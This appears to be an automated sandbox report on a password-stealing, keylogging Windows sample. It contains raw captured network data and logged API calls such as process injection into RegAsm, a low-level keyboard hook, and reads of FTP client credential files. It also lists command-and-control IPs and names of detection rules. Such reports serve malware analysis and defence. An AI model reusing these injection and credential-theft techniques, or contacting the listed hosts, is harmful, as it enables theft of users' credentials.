Data received 0›éæÀÚ}€Gþ¹Üï½?  ?ñ¤¤Ð-Ö Ðt!z P®GoÛÿ,kÓu­>²†³¸*£íûöMËO|ò>4½Å‚‰ëâm4…±XH éÕ¥šÐõLNˆ7$"`Y.Í5Ñ+Ú]ÔIþ3BG]®*“W<ý®Zý–‡[”Û_Åǽâ Ö'•¸Eiל?Ðf2ò¯¦HÃxäW»¡áõõýa8!íM^E^ÅA@>h±Áž>}ÚMVÕ.¬h ]"+{˜žô:'%6º@uqzåÙ¸Y©½ÎÙфd<`eÿ/qó‚( ,êõ·’"ƒ?‹ØÈ·)¨Ø¿ï HAk7R링qXHئ™Zݟ»Hrå‹n?f6 ݽ}Տ-ÔÙgRñÒ:ûÙF<ºrcßâo—»xô×˕Ü0g0ïR^OTÀ¡åÝ †í0ïâ;ºpP»È ®ß‹b“«Ǩ‡+&œL3'GZEüËøqD©B7:ªÉ çP3s€á-`¨6xöVc§Q>T=Qàyšñͮ΋Ç6!ìË,ªz˜øÜÜAs—IFµ“ ¼Œ—­Š¼ìꏠ°“äÏ´x.]:E.°þ&ˆ‘"VŠ†úÉésyLMf;ËÄ"˜8\ßÝÏ)²ôÇEÜÿû%.f=Ǟ<3&žÿšO,|–ëú®§õ¾?çE]Ÿ-Öº™vVÊ;½(ÛPU^ÛäæXº´Ð<îDx½{ÐÀôf ƒŠ_!)sÊÿ1JÌÐÆ·‹êGuìçϱˆÔ¦eÂÅÿx Ë`™­ ²oÕ®—QªÒñl™Õ„»ä<¼á lR³^©ûaÑ;Š½n”ϪæÚ´c,›mNŽðÛ2젚µZŽ‹&/S4¿· €Î(úBáÏ<Ø{?C¾]àka=¬“Õ54ڀ»—ì?»òàRwåÿ˜²é&°s$AP7} >ÐB5¥Ûþ½;ˆ%1ïÚ®WºfdSdE¾•H¥*¥m˜"ªïýDœæ¤*×9UO4&*K÷ŽÈ~³'ƒâà’ÔbTâ—sµIršn¬³ïxNÇ®Ý7n­ IՄüvÍX•?n‡XþÕ¡êÚ8{|ž$:·´`V†géÏÜñ¾u,ǏrZ‹ùbˆOÖ4¬LY€Kß×x›,Ì#¾…Z¾|“ %Ó‹^‹ô¯dÎí½ó`F|У.êìÞw©\Yõ߅OŒZ!Í,K$ØÝapÛv˜¥YBqAvìà¼õ’xÿPn—´t÷\¤¿æ¦÷Y͎!ú˜F|dµjaÝþE >‡eÓ*‰J‰tØèð­bܪð>Ғƒ‹Ì9Xvdq¥ò`‚+2,ʋfF¿+̐7öäB¨{´d¤räӇ¸X½"ߏ•dL­‡O[ð—ß™f–ú”Øj¦S!úÊaý‚Y‚4¨›8ðYž_§;öј8‡ü’àzã«Õ×E1•"þQJÛ֑B qF+¬*Vøb;zÁ`!!èVÅ«-óX·?óé$<,Ž@Åq²µŽyÁ;rZ™¬aßjðW`N Þuhô2¶kÓÿ¶Ye%Ô¥ ý¬F—oNËÑGÃ&·ŽF#MËÛL1Þ<Ž£‚ahWĐH‘^d½ó-5§×ÖGd㈧YHºñˆ§'Sõüž ñÔ÷Ë]ý°é–§nl“4R‚LÉçh› ‰•0ÏNª³Å>f-aOaBž¡²zð ݦœ"m|½¼Q°.™ñ*Þ=ÐK\që¸~¡@B©$Ì$}*å3Zð¬?”ò7/B
Data received µO+·C¾KO~‘¦9|‰î?à6UA°7ÕÏ?Á¬G%GùúÙÝÿ_ºÊ”WFøûr»ï Z¶áÃø!9rÏ3Z>æ•oqL#ô´áîwÐǐ$šÎEpµÛþ¡½JH‹-ƒ(’æÇ]ۖ_¾¡a6zÆSž…-Qe5éyÊIUÏaœ ’_J :™Ô=]VQ «sâZÄV€k‹Ìýö÷·N·†ÇdT`î¦?Éö~bI<c¤¤#¯ÓFÉ69懲º¾%À7Å»w²½ne†þ츜œ@RUâE{ʁ_œ-Uâ,•éN (¼ƒ ¥ÆFҗ¬†Ì)@í'c,ÿø­o§+áÄØ Ù•{ÅuAê4hkxì[RñSõ´³-*¡¯VtêLKµ£At´€,! •_|3!çߓI؉…$÷“|3þx@Úu`‚’^¡™Á¨r{pgô3Á{ãþ9g‘ÎOâUwš8GJ4Mî3¤–”½"ýúÈ” tüؔ^æTÐï =ÚʽÞ 0ë++” ͟CCr.x†ïËøv ;Í=ãėÍÍv¯óÂûåF|Ë2z„ƒ2!øð>uý`-n5«\~¦¨ª*ÅjöOüläV¹:ʾ`¢UWg«NÞòl¨”(¼3Úg®õڀã›ù]®@àÚ÷i֝»zn þ-bù[:rÃg(o4p_Û.páCåÞ%~4WGs6ly¬^uNÉNﯗ åè*Ӛ$óoñ0ó¥_e^"¼ñʈ«ÛÔãIH¤s°gK(¸‡Gh·ë æcb3(Ë+¯å–×<ŠÕ¦H šfFâð¾!ð^qq|…7ó±B,¥ð¨n6%¯OoezËtfå̧Ävƒ Ý­¸ñ½³Eޟ֭6¤Ð+îƒ:d<¸ ³_¬ýçîwyξI”ÄDrÕE—©íEýBBaz¼ÊÂü¶ò„ž°Oå±ñú8Pe1¼ø ´L®¼bi?ýO'²ë¤&ÀñI€q¬lµœ—còû!êñ@9VNܦÄØy„;Ëþ¡)ÊÔ#Œr¦Ä’Ä'Š߂ðÚK‡»éÆÞ³4‰i¦lV÷hÅÁÖ\¼Ê(4û~MqK¨ €)Ü Ä æËøOé€vª½Xu-4§Ö¼õÑ °²JaÚpÏý·£!®n¡ÜËA¼û"ÿÐwÿ_„õTÒ/#õtMT­…’&„!ªêµn* ÖÈÇÂSX@86CµïËXS 4¢”ŠÑØ4e+c<»Í¨mH[ ´åÆý~fFÑRîÖéìö>kÒ äŸÆäÑÏWŵ;кWáéQV5Jd³­g­“ÒRÑ\ëZ§˜Ó¼•F®@Ÿþ+ÑOYegʦßk¯?ÝÿcE9ú©Û¶Oãs›ˆ|S;QÒj¯U¸®œ°Ïîæql ¦o`ù"•Ûb<‚%՞±ÚÌ*Áª‰ZÇÕÀXVÇ¡¬‘§â×P„?çN~(ÙðsÏIÈð·ªæpsÒóݙtÓ»è­eeé]Xn°Ôdóµn.e”ÙkXýD‘­-ÐqÞÅÔò"Á^V×ý“O÷ó÷°re“{ôû‘ÿ*-Ï~À D’˜·Xˆþ§3‡v 8·~hº°º‹€|7»½PÇ3´´úP•µ4Ô¾= ¬+xUñhq’Ìñ•6èMŠ°«ȤÏd®_ ˆúç/ÿ]ÉLíÄ\]5M1o®E‰óæédÑ£A)Ž¤æÙÌN/8›X³¶¨òÁ¤ÐøXN5Zª@ªgµ\ýߛu2i;C
Data received ä@֖f¨«õ  &Ô [±_šÛ°7¸nùBÎüý5ÔÌEsW#>` ‚-3ÀJV´ì%jzY˜Ê.~GÝUƒþO1Kb¯&@ªôT;þX"ª)½:鈶JV>ßŇøFkÙÝdˆ«)IîVixì€ì¤xê3>Z½ÄöHDj¡u3@rÌ÷cr¢{aPü[”O«WòMۓËujìzƒÂ r©ý†0×óK1#ÆA1gkÿÓpdÎ ãÞkŠl'tnƒ"aP’ŸWðeo©ºñ};‰OÛ_B$?ƒq•§ÕP&Úô’óÀ¡·¡˜"ãmÐr‹!¨R®†6 ®¿^ ½²5w¾tt!$~cœÿ¤éIuÖ#nxß@Åt ¼ØqAã;ûþD?«ÿžÚ—qIä¥ ÷`J‹ë³.â1¹AW†z9AC¨Æ˜D+abb+ü¼JÁd\s7¼ê9Téß´Ã%—<}÷â^¹CÔ¨Lí8yrÖ`õÒdñå?nf<z‚áð ô6zá¼xþëîpŊ C!Åu¢ì@í7&”ópèP b†ÅЉ÷„´$¡pÁå2lëޞ² •À®¯Öý¦ )é¿ñ¬Ö4 ,Œú·Ö¾œYϺ…Q£îI[¦Ib¤ÒI«U¶ÁĈ6Ù,¢æSG³/¾>kIöÓ&aƒˆä#NÑ­=>˜¯$l'2Š—ä-¤Ô{Á1Þ%" )1&“ŠÄ‘Uu§âÈ$o#(J‰ÇäRÄÅ= tD¸7éÖ©aiÝÄM´2‘Œh¾9äS›iåB§È»ÒÞÌ>1ùŸßªâhc4^ºU)½´VE›PR {’™ PL§X5?3oàé4^fw¶Æm¾ðî'&nAøêWSˆV=€úÈ°/˜FOªíù/~ž•E¸ u;§¢ž…½-'Îüבøzí-ì²; Ë¡‹ïm:ÚӋݼ‹˜ºò;gèR ³ˆh¾kŒG¹c½âDD9%Û´Y‹Ö¢PiÙge¨o’@S®à5ƒN– ´#–x7ÄÙ«ÁæÈq›#¸#}åA'ÍÃû2¶¿è'ú&ìÉÙ_‡(µ“¦@WÓzMüʌãúÁãéD‰cãÍÂuý©,|0Gݍó'âÿ7ՒüYq©ö~ñ$†/·¬+Ž£úéÈü€¹Íö.櫟ÕJø­û»…ÞòÅøÖ-ô€ÂPå`t!€6¦]Éà/}Èøp ¼¦¡2ÿKև@à•}v߉É*M¶[Ä¥÷©"뀢àa«æ{ü…ŠÚOâÌhƔ 5Œ(¹V ¯ªª™Ñv gD  Ü9â›^5uóP,=ôh«Ë·M(DGSÿ0,-—⍹f›ø(sù¿æ‘ëÒÓÊI»(äk)h‰,f™RaÌ(ǎnjĚYLÒãN3₮ç%f¹ŸžžÒtƒ'¯¬Ú+«Û[ž€i.˜}†ç»º<Ÿ¾»Ê 7?E† UœìÂ&jK0I t(L«ëÙ ³ÆrËlv®™”<:YƒDwæþ£‹ðÓ8ÿ$A™K}3¸&ßúÜCòèR‰ö•k%ÂÊd í¥”hk'Ù¶®»; à²À.–è:~ÔI›3m:Ÿ?Ùò¬Ü2ù´ÅnÀš­O±†t¨¥]øMÚhèúrð“ý×Ì¢)ћïV'ñÊI8ÀŒKX§l›<nä•üòp³õÌ")zt]Ú/vZýž>ùèÝሣcf³}.·ø(쇀‹ÄÛi¨ð£(Îÿ®`܀ã׫R÷,ƒ­
Data received Ü«ó0^ç¼ïø]!|ýíˆqW§¸ÿ„gR\ _G ?ñSô`()ŸŸÊ]-b~Zooµ—þž@´ŽÎÙÈÁøär÷B(e“3dãA×x,'=:é6ÿOžÉ­ù@özzôˆpÃñ{F¹ÌØ ~¶ù'ýGa”¹Ê€ˆ¼'««-MTÅ!×íWÿ}1#M9ØɺÝ{ë5V-kÏÏù-ƒ=‡üÒêN rÌ'"¹#Ç D}«™6ìÓØü#4…¿KÓÀ Ï~Væ÷DªÓÕÛOùË{~O­6“|†ð(f—¿Å.Ü3${óÍÊl·Ü­º»¿fv A‰ÛáÜu~C ÞD¬­ wU‰Òc úJî£å*ý¤ ]\샽òõN×íä0²"ˆŒß=DªêVÞ·ê%é_oÌå$"çX ƲҙÁfœëdñbÆ¿¯?fçlsޜUú¼næqƒPeÛÖÚ‡"KÈ®íèè%€W¾vMeßD`ï»kodt36Ô ²ì>B¿ô’ÄàSD±—Úm Œ÷§iC÷›·Æˆ^VS#Dò78Û'?k¦? -†WJ×O)qcefkëÙ ù²üµ?7…LÛØÙÊå)tÇo»¿¢ˆškò;\©˜ý$þ=û‰n­ ¸ xåÕÃeM•TQ^ê¶ùóð{¢¬@VĻۿóìèݸ¸ßYÙÀžþÿ|&Rþð™$ ócËÍ926#EÒfî7Ü:û7«müì0õÍ);ŸÀ“œ,”֝Uþ¤TTŠ¬ö!!™B2šEßýï] ¢û78™¨TvÓ¦û’-—ÝdZ;-àêŒ_iÈÈÛbdäK¨D/3öOҐl£P¶"`r+̏•§d𠧙‰o!Sê¶ö·¤ö*³k 7’â××öŸÈ'f)`¬ #‡qáM9"²Ão,¼w‚2¼» @:¨…63 ò+öðQRþmzž¤Ï²Zîü®TCË®¢̞¶íÜð ¶Ï^D7óܼò@æäùãZêtÈC¯tYœ°hJ©ÿÍ77õÜôë ³œWµçý®‡%ØÎeêöã^8ø•PŽ…‘ñþi·v“-cêp›¢Ç&W’EÓ|ýÞ£ô7*àËéÿø¼ñîûmÙRL0t 빫¹ÁßFrӁ“öj¬,½u튱Ž“v®¬û…[8<Gà$„)J8»ŠÈßÀ¤Z¹Ÿ;¿äšŠ¸°Ñ[0û ô'ñŸ£KG߈íjÔ×É@Îð3yà—p밵Ǝ(\â—x9Çs·Û‰Ô®ÉéU‰cq¢E®Á‘X 'ær`ÃkF3:[V{á6äNE.+!Ž¯´ƒêÜâi íq<°Æ1úV_Y°Â‰&%&Kô֊³5ò²¯Î‡!¾½µ³kÐßè¹(’¸×hLr vþ`E™t)3Nf"H.Y¬/öªÉ©(ИþÈêuOéβ»$ÁjÿŪV4_' ‡®Šè(3ò ûÛiTÒÃäÈÍvWTw=b 8ý…Š/ˆa±½ë‚tÀ½žI…J^sKaßÉ®.ƒzríåúé:ŽKÙg¹iÜ_®r->X7dPQq9AëåœúÚṂ@&Ñ17ZjçìS` GkËΫߎ/jLŒ GkïàyɊóþpä§C îøPXÿৱXŽ^c„8KC +cß‹•Æý;Oh|´`_crȾ5ºø߬PÌ\Xžã¤fwçOäQ^pŽ›ä´ôÖ¡Ýss»ÝÈ˲ú;F [²y'÷‘Ë/Ï©¬cüQ—^Dº%B
Data received @ŠÕŠ-¹ƒ£¦cwB—ê?ŒÕmÓYý«Ó.:0%ÏpÿñÄ9¹šk‘yâT“?Ý@9„ ÂÒ¿~V?‘¹~yVY¨¶;&mQÑsuV'Ó¿aók)©jÇ@-ÑvU*Ÿ/ Ð+ÊÉâbé–{K—Êf1­eZ‡®•™òc¼atüo,ؕçP ÊSµßå[»ý¡Lëò'3Ø@Ìê$°JÖÛ þк£ÉO¸W”SÈE-nB§ËÓ5ó£!†d¼'Šº]ØëòlƒÑ}sZûmPå«o€*mÕh¬Dÿ\‚FËocA‘bKiÄööïÅ+ç øEv²C~õ+dª¯*‡™³ÇCxpœ¯ ¬ÔÄ­M—FddþË@™YøJ’&T èŒl |’ÇX˜ïVÆY s 0ÁȞÅzÝº‘ÿôm4÷ÇI©‰‰‚´}í*«>·èK@ýâvmõËgqiì0ñM8šQ+–ÀƒWd£ÐÑÊÎDaȧ²¯#SŽ aó½X»IËܬ d;^ªkü-ò©¶F"…³r+%io”œúÌn•­¡¼©})AËJB¦äþ.›?v ݺUþ0XYáy1¿âð7¾â9S £ˆó3O3\ú†‹¢ÿBA«/]Ó$«ÞÀˆ­ðq“¼êRæÅá4¯”K½Jh{ÜÖ}NÅ&‚×ó X쁗v-ëÄTˆFh|"³R¿Í@eBɦH”Ð'ÆMfJù4º_2Ò·6¼fº×תàà£-lo:íðÒÐm€·fûKD[52CøTòZ×m‰ë˜ßàEëïÞTÑ£ƒú…?zÌæ´V"LÈUî–\¶7ñÏmùO‰†y¥R‰!Y«Û»ŸñŠ-#öjÏú‘DH»ûŒ'ØÂdhWêfˆÆYFAïtu«>"C ï“Ÿ„Sñ´vã3âùÎ̤“MhtÙù »dXŒqÑ£¢Ñtt¢þÒ¸†é¿A˽nýêWŠß¾Q"ˆžA¿¢û_©vøzô˜³)µtý©i’h¸0çÚu–úLõ½ÍˆŠ%…Jºù¬}ç­¡p’åؤ /†oLÇs2 ûl\•×+÷ˆÔ#¨f;|¬üº^7þêaeÜ~MÇòoÛ¡€Ï˜,ð02›0q†¨'‡ú„3ÎÿfÁ0ä4#H“î•Ñ:áE¼ÂlêHR¯¸Qž‹QCdÓR"æ8¸Aˆ[1cË+¸A¿ ²¸»Y nãÿTAof*ÝÐ+ n“hh!¶‹oB쿑xٓÈ=úø³Ô~ßm"HìI.å¿hþ¼~+€å’…qˆm¬”ÜŒl}1ƒ°üIÅÀ£ú¡0¯Ë‰àH€`æ¬1¿“Лz!BèR±Tær.çÎnæÆÚz»Oî8Oq9šl$ôĈƙÅ5£þìiV<Õ¿ ÅÐËy÷²~:©%IÖa[Ê¥Ì]9•Ÿ»"£wÍbŸ72L~'e'\Ä¹Ž4õÙ(x*±Ñ ¹³4˜wûKk G{åL-G”m®0»=ø÷úR)‚ ¹úy&èk†<ñs®Ñ=b€¿µ ±-úeyÂÚûäy°ÐV%rª™À¤CùÝS®^ yE­¬A8Êøc=Ðàå‡ñ(»4¤‘ÄÞ´ö~B§ïP•àê©á,ì<ܨy7NÈ+ÑÚyaÅMÔɯ¦fêd‰“üòé¯Ð©ÓHÝ|æ¡Y-›l9…Ï‚wB§»;N\áW;Y ÙñwÿSqmý.x–M“«¿]±™¢Ã’ù#· Žÿlrv4!
Data received ŸsÒú'$”°tfÎe¼¸%iúe}~ëÞ?.Á¡h_*ûš:¾ÆÓ³Þ'HÍÔ¬ ¯c ]ŠÄ~UîïìêU$–%A®/M‰®ooX£r»Ï9J¹Î³È9…³rË´‚Ê<œ l}jk\­3R¾”ð¥_/ß_1Ñ*ȏþ¾sGÝPÜè+Jc7©2/ºB£~ñí¦ÚÓf2Î;mxàª¶·á`@ø±žª2‰‘)Üö”QHÌÖ-D¼­ÌTÛ§T3»Ò ™¡Á"ÊT6¹½;ãˆ9±{¨2õC !L0w˜&p=—P¡ùÏn@½ª ÓSlosÒ¸ôBf|ˆˆ±è%© éØ©u³ð1¾Ý… ÿ‰AÆΈÿ™Måù?ꀎ¤R<õ! OQŠ¹Oº§~’!‚ùç^srz#Sú†62HìÔ:¨íÖ°àRÇΊG«|1ªÖs„Ãd ¯N+g£^M‹T”xøÄå\EËgÇ$8eåã*Ö®GƒŽÖ`ûË#…8EQŽŠ=øLø¡‘ˑõo«ÉvãÿŠiÇÇÔ(¨³¹P.®-u$ÑÒ)yæôui\Ô4P‰0™#+|EØËhÈuãò †ïŒ­Æ¢Bæ´+DõÅ¥Aߣ¾Ãå–>‡ú= ¦$ܔr®Bê|ÄE«i) jϞ4MÆK‰LìÒJ<eãDz+¥»‹”ŒÞ¿MA»&ìú3FÓö}¯+œÆ1û‰›K²EÊÁ±½q|©<Fš€¨ÿÒ? à f™¡Úäû‹\žW6cj›Ó郀Dý÷RkåJ÷\% ÃGzí~ê5;½ãó\ÕrŒÜ0Š3H"š¡ÁAÍ~*‡M²ê€+ªè÷„ ˆZCâ’6٘Ï:1Q|° t"Ææ løÒ\@cÐށ9st S„rû<uªpØ‘mÂðy|TYÄ>#XÖÒÞìúÀP²_¬Üw]úú’†šã\䈏ùyžm<vTV ¡O´mû‘ áúËQN[`ùUYÅ\ÏEb¬±ǐÐ,¨N†¬5õÅ£R¹dZZ$ €ý9V‡^óHýÓå) ¹,–á"î5û¤TôÑKW€dF÷âSΰŸ¸¢úZQÿŠWµÐÍ”J?õ?«Êîp¸zP -©õöðczò±‘0Î &QˆÚ§“9FìÝ%ÛaúÏóëŠÛ7z +»Xe£¿›eP«H ùUÑ‹3°­õï]Ų&šIu¬äQ-ZßÝ>TA›‰FÍKB¬Ö6«¿Òé Ë.èõϦcŸ#¿-¸LºãÙ㠒BŽUê¡-œþ_æd[Ù³ #Ç¾Î…ù#—ö~L::[·Æx³­«|æ% ž¨ý…––I¢FÚ¨9¼k€ê¾¦µª =þjr~Ï>Æ´0ö÷¤„ø(·Hp6é®ÌtGdé¬IÍGjeú|F°Ec*½d\€ÆࠓfLœtYtÉÍ~*ír<×%¼ ‹ãòå‹íD³VÂEÀGeè»KA/¾úv³º£k?•«cÒ®Q8¤MMm‰»J1åÖ¨ä#1š#€Z¬½k÷@,ÙÈ=‘[pä]áYÃØ_µ;$J ô_‰S„x!­HçÀC[#‚tÃr§šÊ.¯@$³dáë²Ø ÖNÝFŒDz½š$û‘˜Ig³iro#K Б×Nk3½²ÊÜåd!•Õw¶¥ñ* ØÐm½hè‘* ¬¥Žkqá*ùeDµ€¯öäBH]59«3£…Õvö%Q‹p¯æ@Îa
Data received úAU,V™€Õ TµE©uPróé—þ_¢A(¦8ɆÉÅ J¿l¬)m¢&}»ã(²ÆžÚ‚ylÔ©6!…| !s˜Ô~ZƘ¥ ž"<bgOD½´­3þüwÞWuª/oþÑÏ]œÔ­ÀŒ24på¯TZ€†>[þ beïU­ ¥o7r&íU˜úüL©œxûÆngq<§A%O«&rѹ¡ÀNu½œ‚ çŸÔ¡~3-e¾–4©"{0™ùÕ½ÄIIƒ+§õ.=…C»Š¢_k‚Wb£´e aÕÍÔî\Ýìèujõ2>ý=Iý_™8× ~óZgù ø»ï°7Ü [oR&Ā|'¥$æŒ÷ƒVø ܆~8‡gÙa÷ág”¸1:÷ ¼Ýù|Ë`‰¹Ž¾§óR·óœ_ézZóü¢â‰|$WZ’ëk_$„E!¶ßV«#â^öòEŽ„˜e6ñPœ|å—égÏè±KÕýó±Ø€§K‘?æ\óYrƒ(ã`ü»R·ƒãх!$€¶žÐ{àó•Õ©³•5 í°,nù¼Î)ƒªN‡=)­ÓÞC vÒà¿¢ñ IŠ`rÉ@Êjc¯ÔºÄ¼XÒ]Ʊ3S-?S¯³{“^S€Šeu ´a8|l8&³ó\ˆ•¨ÙÔ¬[gÑÙZäҘ¼ ~™‹™¨ªW×#“n0]¬;0.pføˆmdç•ÝÙ~KÁȌ׼$9ÀìÜþ §Fÿà‰1úóÕ¾LëXѹÆíûÂ÷>²o—¹DFZô󠜪Y´Ÿ³ŸpqDnÅWšme¦0a‘•òÃÆÒuã‚’,DáôÝ>{Õõx1=Ïÿ|M’ƒKÓnŽé̔SKÝ5 z¾®‹ÑP½ùƒJö-ã­§Ùå×N(Bmg6Mu¶O±\{€is¦u)ýšár¯È‘D•†Ía['Š2‚âßý>tefùj8ŔLmW$¨‹:Öáғqó z)‰”ÓyTŠÓŠÎwËÀÀaS=°êòšüçúmÛyj}¤†FÜä%md47¯ 8UÄy<Q“bÞÕUìæþ˜ç-Oe=•M¸µ’Ýú2÷]à Ü[èÍP:wƌPaM/î۞ÑîtýCåßT…AR¾ÇÈø²-Þ§/W1ŠY—n¼xCù!:4G—R«ÎêÌ÷0ÕðîÖZ7ptãÀK½ÛÄÃãêÓLñŠpßfb!т¨ÉÖ ož°ÖéùŠÆŠ±0¤Ç=,CÑî”JêŸu?œÅúƒÀv9¿ »~Q²^5ÅÍ?‰t‘ûW$£=^$õ”;òo¨íµ²µ¥)c˘·¤–Àšž:ÉÄñô¶¾G¥l —¸^“®Ê´Ä¨šÑÊL±¨R:hé!‹,˜:vô˯Ä<3Jƒú>8Ïõ™ï…góãî=Ø~ ±D*sC³|Òd£‚±ƒ/xEÄÀTÑbpÖ¨…ôCŒæ²yŠ¦ JØ¥26$môOïÀð­–LÉ1ájñövŠô³x0Ä1’~…÷»Nr ²µ\ƕ”J¥a‰n ­µÂ¾ŒÐܓ.ßéL2緇íÄ×½| y¸aŒ+<r^¼‘Q ,Èë½ ¯ˆbH¿¾­!{5D¦}øÕ+ØF.³+#½¤TðC Õ˜:_¤vUÝ¢E¸Yl7Ô„ÌhB)±Iæ¬íAö:"ɏO9óÊMf1“KåÚ}Œˆkèï+þ¤ïžÀM®
Data received _‘\‚fò Û´õ¯…}iïeÛ"‰÷oêL•p¼#LzG1=¬Ùá-fx¼834šþèöÅ¢#ÉâûAâJ<ÆÁo2D’Oä֌yP¤O渐!ĆÝôaZ瞎ÕEÀXÉ.•¾øÀ_˜3Æ˦ º²±-õ=6¤?"½™7`ìɪC¾l*ãžÖ~œãÒ0ÂOâˆ(´C—¬ê¤¸Ð—Á æžÉ2Z<Ǫ{WrGçLà„è(9\ÃÕð×yý·Ÿváþ6–ºæžZ4üuä#b{TlsyKÁü5=bG+ö¯âj؏!!ª¹L‹r¿o].—1ÌsÒåsoCŠÓ›F¨µ·s³}‚½áD¬`#žeÔY‹‘ü—ð©óê ¡âLBq·ܾb+©¦bD90Ô¡7¼ è/K¬…Ä3®œ Xyæg‹/vH•ö7éAôAŒlA-[dH7Öç€- Vv8 rc¢`éX@8nBÝBQÌ;E˜^•bÓ=Þ¹]E ùDwöö€¹yið%ûHor [äŸ_à^2Ýÿfu©§è' ÒÁT z¤[и ¡<&ćPæ¸&oY•Náù¼î¯Ø؍sʆiüò$1C¯ÉãL·†žŸW—éܹKæÆË»þâE9!—Oñ¥×ò}úèâþ{”G‹,~FŠ>ëHåÝ8Žgd“üZù\7™ËŸ#™v8K êĂúëê‡Îl¶Ê,=®"Š8+šu‘†óÙ|¨XÿÁ1¼ïE£ÍÔK#H^dÑòCÌ]g f9©Z †¶}Î Úì\½Z=”§{ Ìq»™’·ª÷O´¾¿Í`Ö¿ Ê¿ü½Á‡ƒ½{å7¹d ƒ½E~JC~¡U…ilaHmq<ûbØHúÛE¼ì‹ÚV0r= ;{kt¹ø ƒûâMÉ}mD"‡Ž?i&(YQªðçDni"Œ/«I •ÅÜãúóìañ¸! % ñÅÍ2mSdu“Z›Óšc—Ü´†1WQV— ýº’C, ”ùOõÑô&ó )¯¶»>!eÏiÓê-D…9Þ@+ïƦO[¥€¯Ôl¸×±GMYJ崋ƒw<E „Rm ÆÌÛ¹ùºº!õ Ž>‡Üzº²xJ·Ê©}s@Žø#Ôd}[ä§ÖâñøÒèq½"BT'ñø‚ÜSaŸ.ÄoÓøÀWÐX%y8°¥Ç¦Äa69¦°@GÎ`Hnc¤ç‘0Ð_ú½§ÉúÚvT—_qVu Iª!ïM£Cà]‹Ã\†‹ÁRñÿ[î8T¨¼d9Õ/þAĘ^›æ„Ã<áhMêz²‰žrL©/•,_BTʜWÝìE#W–)ȋ u4òŒKN5¹Ñ‹iíîø4<í<.a§ìW+±LE˜ï‡»ô+.4 Ms2zô!ié«Ú7ÂÙ¶»¢ìÃQsùIô«LA£LÔ ÊÖN«*pyIŸ9'*ÝTuÔ&¡×ÎÁœJxÝ»J›!ôߛ‹x÷j­T#þt²¼:©Šýõr"Ó<Ñ†ßHip çû[3.æbûhD͵ˆ—?üˆª8Gô¢ˆ˜·¢;üWÓM1Š·|¾†‚]V(LGo¦(§í£»R®÷œéÃ9î6tÌØ{߸ú5]X¶’ûò3’—`p¾fÕMð50PWu3¾Û t„k™‡ñb•2NsX—G6;±8Ðæ&9‚1yë°:©D¤ÆêAÑl -¿p—*(Qù[owk€‚oò-1„µÌ)=3ÅhÙòÆÈKQÐèÖ
Data sent [binary data omitted; readable hostname in first packet: imageupload.io]
Data sent GET /windows/HNB.txt HTTP/1.1 Host: 141.98.6.91 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description PWS Memory rule Generic_PWS_Memory_Zero
description Communications smtp rule Network_SMTP_dotNet
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Win32 PWS Loki rule Win32_PWS_Loki_m_Zero
description Run a KeyLogger rule KeyLogger
wmi SELECT * FROM Win32_Processor
receiver [] sender [] server 192.185.51.90
host 141.98.6.91
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2568
region_size: 270336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000003a4
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description RegAsm.exe tried to sleep 5456486 seconds, actually delayed analysis time by 5456486 seconds
file C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect
file C:\Users\test22\AppData\Roaming\FTPGetter\servers.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
registry HKEY_CURRENT_USER\SOFTWARE\FTPWare\COREFTP\Sites
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELdò5eà  ¼îÛ à@  @…œÛOàF  H.textô» ¼ `.rsrcFà¾@@.reloc Ä@B
base_address: 0x00400000
process_identifier: 2568
process_handle: 0x000003a4
1 1 0

WriteProcessMemory

buffer:  €P€8€€h€ à¼\ãê¼4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfoø000004b0,FileDescription 0FileVersion1.0.0.0t)InternalName4532bc7c-f4dc-4e38-bcac-17c8e43baccb.exe(LegalCopyright |)OriginalFilename4532bc7c-f4dc-4e38-bcac-17c8e43baccb.exe4ProductVersion1.0.0.08Assembly Version1.0.0.0<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0043e000
process_identifier: 2568
process_handle: 0x000003a4
1 1 0

WriteProcessMemory

buffer: Ð ð;
base_address: 0x00440000
process_identifier: 2568
process_handle: 0x000003a4
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2568
process_handle: 0x000003a4
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELdò5eà  ¼îÛ à@  @…œÛOàF  H.textô» ¼ `.rsrcFà¾@@.reloc Ä@B
base_address: 0x00400000
process_identifier: 2568
process_handle: 0x000003a4
1 1 0
Time & API Arguments Status Return Repeated

SetWindowsHookExA

thread_identifier: 0
callback_function: 0x0091086a
hook_identifier: 13 (WH_KEYBOARD_LL)
module_address: 0x00400000
1 2359589 0
